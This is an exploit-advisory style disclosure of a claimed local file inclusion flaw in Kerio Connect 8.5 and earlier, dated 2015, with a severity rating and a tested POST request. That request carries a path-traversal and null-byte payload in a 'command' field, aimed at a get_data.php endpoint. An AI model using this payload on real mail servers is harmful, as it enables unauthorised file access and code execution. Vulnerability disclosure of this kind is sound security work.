SUBJECT:
kerio Connect <= 8.5 - Local File Inclusion Vulnerability
DATE(S) ISSUED:
20/05/2015
DISCOVERER:
b4dboy
OVERIEW:
Local File Inclusion Vulnerability have been discovered in kerio connect. exploitation of these vulnerabilities could allow a remote attacker Arbitrary Code Execution.
SYSTEMS AFFECTED:
Kerio Connect <= 8.5
SEVERITY LEVEL:
Very High
TESTED:
POST https://connect.demo.kerio.com/webmail/get_data.php
command=../../../store/tmp/upload/admin-en@demo.kerio.com/6f94c22ad0/efc91192%00